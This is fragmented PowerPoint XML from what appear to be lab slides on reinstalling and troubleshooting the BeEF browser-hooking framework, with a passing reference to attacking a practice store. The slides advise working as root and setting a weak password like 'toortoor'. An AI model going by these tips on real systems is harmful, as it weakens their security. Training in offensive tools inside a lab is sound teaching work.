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2" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="284" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="274" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="275" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="280" r:id="rId31"/>
    <p:sldId id="281" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="282" r:id="rId34"/>
    <p:sldId id="283" r:id="rId35"/>
    <p:sldId id="285" r:id="rId36"/>
    <p:sldId id="28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01EFCA-8A11-C1C6-627E-7280339326FD}" v="47" dt="2021-12-12T12:45:45.874"/>
    <p1510:client id="{E84F4DE7-34ED-4B54-A3E2-526546621FE3}" v="19" dt="2021-12-11T06:21:38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ck Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T12:45:45.874" v="32" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T11:15:17.326" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2714311017" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T11:15:17.326" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2714311017" sldId="271"/>
            <ac:spMk id="3" creationId="{981D637C-B039-4E66-AF47-6418F5259D4D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T11:25:03.076" v="30" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3569079171" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T11:25:03.076" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3569079171" sldId="274"/>
            <ac:spMk id="3" creationId="{EC5B728D-4AF2-4592-84D9-D8EFF8F19D7C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T12:45:45.874" v="32" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1755519966" sldId="284"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T12:45:45.874" v="32" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1755519966" sldId="284"/>
            <ac:picMk id="3" creationId="{73E42C38-3816-4192-BAFD-631492A9BA7E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T11:18:52.947" v="5"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3249240458" sldId="288"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add replId">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{D001EFCA-8A11-C1C6-627E-7280339326FD}" dt="2021-12-12T11:18:50.384" v="4"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1034408333" sldId="28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E0F7-8CBC-428C-A110-3B3509C72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CA1B9-8A04-4CDD-BA7E-A24F2DFAD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F8ABC-03A5-4B1E-8D0A-B280671D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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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B8A90-E5BF-4FEC-8558-1CDACB58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1B6A5-1770-4C7E-8C99-CAED5227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CB5A-9F20-4491-AB82-333753BD5A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173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FA8F3-E22E-4613-8223-D2C99403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66571-44A5-4AAC-93AC-C5D45A87B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D32D4-EF62-4CC1-B68A-F54E0B68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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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C026C-585F-4774-883D-84484CD3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19798-4837-4184-9031-D04DE2CF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CB5A-9F20-4491-AB82-333753BD5A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527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7C0DB7-CE21-4392-A39A-4B73D4695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6CE9A-2862-4BF3-B058-16953DE10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33DCC-9107-4C7A-9742-0F270227F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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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E058A-8301-44C7-9765-5CF695B0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D61CA-9C13-45BD-8630-BD1A3462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CB5A-9F20-4491-AB82-333753BD5A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742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D9546-5411-493F-B11A-F6639CF12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F1165-DB43-496A-A28A-F9971AE01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340A0-DDBE-41BB-A038-A1DF5CAA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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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25081-4B9D-4DCA-B6E9-21874328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654D1-892A-414A-AF49-F309400D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CB5A-9F20-4491-AB82-333753BD5A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648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1C84F-637D-4F65-93FB-B45B9C94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B575D-ADCD-4CF0-B1E2-31AC5D960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79DA8-D686-4728-99EE-70EE3207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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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17359-3F0A-4DC8-87D4-422C14E4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7B510-DC24-40E7-9FDB-A43A0A8A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CB5A-9F20-4491-AB82-333753BD5A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956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3EA6-162D-41B9-BD03-3E3A0B3F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DC4B3-2BA9-4CE4-A99D-D2551A939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9A3DE-CAE1-496D-882E-D99231ACD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0ED9D-E340-48F0-81C7-190C4847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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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AD929-645E-4262-81B1-4494929BE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22498-778F-41B6-836F-B89F1203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CB5A-9F20-4491-AB82-333753BD5A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246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A3BE-A494-4ED9-8186-5BA3C7B54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8D045-447E-4B6D-8271-278A7E5A2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B5854-7FDA-4581-AD76-C9B7473C2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6DCBBA-45BC-4C4A-9653-C3EC9CAEE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3BFD13-4542-4548-AED9-299564262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66D966-1A44-4811-87EC-544DE5408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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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64F76-CC80-4CED-8357-3CB07D5D3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A3343-7044-48A3-BD8D-5E4DB6C5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CB5A-9F20-4491-AB82-333753BD5A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561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C81E-B492-492F-A849-9A8D88D95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8E912C-1961-4C86-BB30-87310F8EE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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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81DA7-94DF-47FA-947B-C35C2CA6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8B46C9-D6CB-4C1C-89F9-704A0C21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CB5A-9F20-4491-AB82-333753BD5A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552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E04ADE-AA54-4E4B-993D-A4FBD88C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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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FBAB2D-883E-4FA4-BA0C-90941F1C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8AAC4-79DD-443F-9713-E50CA9E8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CB5A-9F20-4491-AB82-333753BD5A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69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6A3E-E871-4EAB-9357-1C50D0830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57525-D461-40AC-B80D-B62D4AD04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D0406-4DA8-40E1-AD5A-406E2828A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678FA-0E8A-4BE4-A3BE-CAD94460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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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2C3BD-7A5A-4950-B1D0-9E002AF04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E1C9E-D819-47DE-9CF7-5A0A6097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CB5A-9F20-4491-AB82-333753BD5A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419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3D843-E28F-4B0B-8549-4A77442F7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99B81-9C9A-422A-A5DC-7BDA043CB0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93B63-643A-4A16-BD0A-6117022C6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29C5A-E1D7-42AF-BEA6-C6A39AD4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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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99B4D-8B1B-44F3-B3D6-850194B7F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F215B-DC4D-4748-A11B-D1D5A2AB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CB5A-9F20-4491-AB82-333753BD5A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817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21CB50-388A-4339-AC2C-83029E32F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B89A2-A905-4C22-85E1-8712A88E8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DFCA3-0AED-425C-A221-DDCA0A6FF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01CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>12/12/2021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D8414-339E-46E7-A9AC-9068266E1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E8266-5E72-4543-8074-003D9A8B5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5CB5A-9F20-4491-AB82-333753BD5AE6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7CAFB-D4C2-43AD-9DC3-D1E14056906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0" y="0"/>
            <a:ext cx="2436813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1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Official (Closed) - Non Sensitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57287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linuxlia.com/2021/01/27/failed-to-execute-default-web-browser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7B96-431C-48C3-8A05-093547974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BEeF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> – How to remove hooked browser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05F6D-6CB6-4A72-9532-A85EEA6479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Must Do Before Common Test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2737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C41259-6CB3-4996-8E52-FECF6C851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1400175"/>
            <a:ext cx="6324600" cy="4057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E175E1-7BC9-402E-B889-76E035D1E1A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="10542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you face login problem… you have to remove beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and re-install…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9051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9EFB8D-1219-42EA-B085-CD5252AD16CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="10542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Remove beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss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8B71D8-77D1-4000-AADF-ABECB80F1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54" y="1463487"/>
            <a:ext cx="10240477" cy="373552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8EAC2115-D8A6-4211-8199-736071CD58D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349624" y="1658993"/>
            <a:ext cx="733130" cy="600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1577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3D1190-7A4F-4324-BEA8-7CF5B03B0313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="10542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you can’t remove them through the above method. Stop the console and go back to the Terminal where you start beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Find the directory where beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is stored.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2AE11-422E-4259-AF2E-40A67F474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039" y="2053477"/>
            <a:ext cx="8735265" cy="40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15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1FC714-D207-477F-82E5-788049EDE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953" y="2106986"/>
            <a:ext cx="10058652" cy="37021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DA7E24-165B-4DAB-BFD1-B49C41F08FCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="10542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Remove the three directories using #rm –r &lt;directory&gt;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6178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0C2A92-E615-4FC8-91DB-D9F00D802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93" y="643466"/>
            <a:ext cx="1066621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53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215A7B-C52F-478E-9711-E87651F708CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733713" y="1016752"/>
            <a:ext cx="8724574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Reboot the system and repeat the installation as before …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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1711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215A7B-C52F-478E-9711-E87651F708CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733713" y="1016752"/>
            <a:ext cx="8724574" cy="144655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still not working, use another method... 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FFFB0-8491-4476-BF9E-0ADE48DAFB8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2893944" y="2993335"/>
            <a:ext cx="71661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2"/>
              </a:rPr>
              <a:t>https://linuxlia.com/2021/01/27/failed-to-execute-default-web-browser/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0748C4-DD0B-47FC-8372-ACF18DCC81B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803492" y="4023778"/>
            <a:ext cx="8727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this method, it sure works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298030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FDA63C6-467B-472C-A55B-A5DE4FF21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84189"/>
            <a:ext cx="10905066" cy="34896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1D637C-B039-4E66-AF47-6418F5259D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6623122" y="3571706"/>
            <a:ext cx="325810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IMPORTANT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- Do a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and operate from there onwards instead of using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> all the time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2714311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E42C38-3816-4192-BAFD-631492A9B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283" y="988990"/>
            <a:ext cx="6072688" cy="50027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F561F3-7DE6-4F14-9AD6-694476312A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576684" y="370109"/>
            <a:ext cx="3258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IMPORTANT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Remove all folders related to existing installation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1755519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05DFE0-966C-45A2-BE7F-EE122ACE0038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216856" y="1862812"/>
            <a:ext cx="95386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REBOOT !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440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9F5035-5FCA-419C-A3A0-EB44D3B0B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87" y="1733550"/>
            <a:ext cx="56864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3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78AE1A8-24BE-4961-8CB3-259E24731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67" y="2502440"/>
            <a:ext cx="10905066" cy="36259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78B37C-D5B5-45E1-9DC3-7A0B991AC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03296"/>
            <a:ext cx="6172200" cy="304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9B9AD1-FD06-401B-AB95-152646A7EE93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576684" y="370109"/>
            <a:ext cx="3258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IMPORTANT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Existing beef folder also needs to be removed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C3EAC64-8080-4BF0-825D-A15D380C4542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5169159" y="1399592"/>
            <a:ext cx="597159" cy="373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5764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7D24A2F-86AD-4912-A980-A5548CCCC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934" y="2627458"/>
            <a:ext cx="10905066" cy="36804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5B728D-4AF2-4592-84D9-D8EFF8F19D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5302695" y="570961"/>
            <a:ext cx="5441369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Go into the beef folder in /root</a:t>
            </a:r>
          </a:p>
          <a:p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3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#cd beef </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p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3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#./install</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p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079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5E12D2D1-E6C2-4DBC-8C9A-52550FD4C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01" y="643466"/>
            <a:ext cx="5412246" cy="593123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1ABD9F4E-DB77-497F-B3FC-B6BE40D23F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2689934" y="4563123"/>
            <a:ext cx="747291" cy="461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54F83F4-266C-44FA-B9A8-B6261625E900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007706" y="6095445"/>
            <a:ext cx="2429519" cy="420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64EF6-8E97-4EE7-98DD-B28D5118A380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="276775" y="5515423"/>
            <a:ext cx="3160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You will hit into an error here,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>Follow next page to continue… </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2306312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1276C9F-A571-4700-A3FB-C07B0B898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37" y="2483755"/>
            <a:ext cx="10337975" cy="18866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AD8D20-7EAF-4178-94AB-1F15BE6F53F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105302" y="3694516"/>
            <a:ext cx="544136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Just continue, run this command line under root account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799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63F704CF-689D-470F-A02B-7A1163DBA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56815"/>
            <a:ext cx="10905066" cy="2944368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E5A97E6A-AF99-4680-8FE3-425990B80CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3107184" y="3764132"/>
            <a:ext cx="1322773" cy="18199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07352E-6607-422F-B13E-FA63AD3EBF42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172989" y="4058500"/>
            <a:ext cx="54413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There are many packages…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531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57E4FF58-8657-4204-86C5-B654658D6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43516"/>
            <a:ext cx="10905066" cy="47709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5300F4-6E7B-43D2-9F33-7EED88EA5A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654631" y="397185"/>
            <a:ext cx="83917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And halfway, you may hit into another problem… see next page to continue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326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93A7AE33-7C7B-4099-B3DA-CBFA855F8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65" y="740762"/>
            <a:ext cx="10905066" cy="5234430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Left 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B903668E-983F-46BA-91CC-AE525336F2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371408" y="956876"/>
            <a:ext cx="977347" cy="4886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A94C0-BB64-4C27-8253-48ADECA84D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="26337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 Execute this command line to continue …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2923618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3359208A-AE6D-457A-92C7-F053165A5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25415"/>
            <a:ext cx="10905066" cy="52071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215935-1D03-4315-8D5B-6FEADF836BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="26337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 Run bundle install again…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2489720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F8AC05BA-7D5C-483D-9C41-C42CB4F1A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579" y="1825023"/>
            <a:ext cx="7974842" cy="19538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1DE8BB-0F0C-46A8-98CA-A652DF7DE097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="263373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 Enter ./beef to start beef in the beef folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- You will hit this problem, just edit the file and change the password, something like “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toortoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” is good.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868080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05DFE0-966C-45A2-BE7F-EE122ACE0038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216856" y="1862812"/>
            <a:ext cx="95386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REBOOT !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5736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172E75-EC58-41A6-A24E-3CCA47C2E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789" y="1319601"/>
            <a:ext cx="8742422" cy="42187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49530F-A276-4014-A3DD-7FDEAF8C2AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="536046" y="662609"/>
            <a:ext cx="1054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After the first practice of hooking up the browser that we used to attack the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Bodgelt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> store (see next page)  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3128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968B4FB-A5D9-4A71-93AF-9537ECE16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99" y="643466"/>
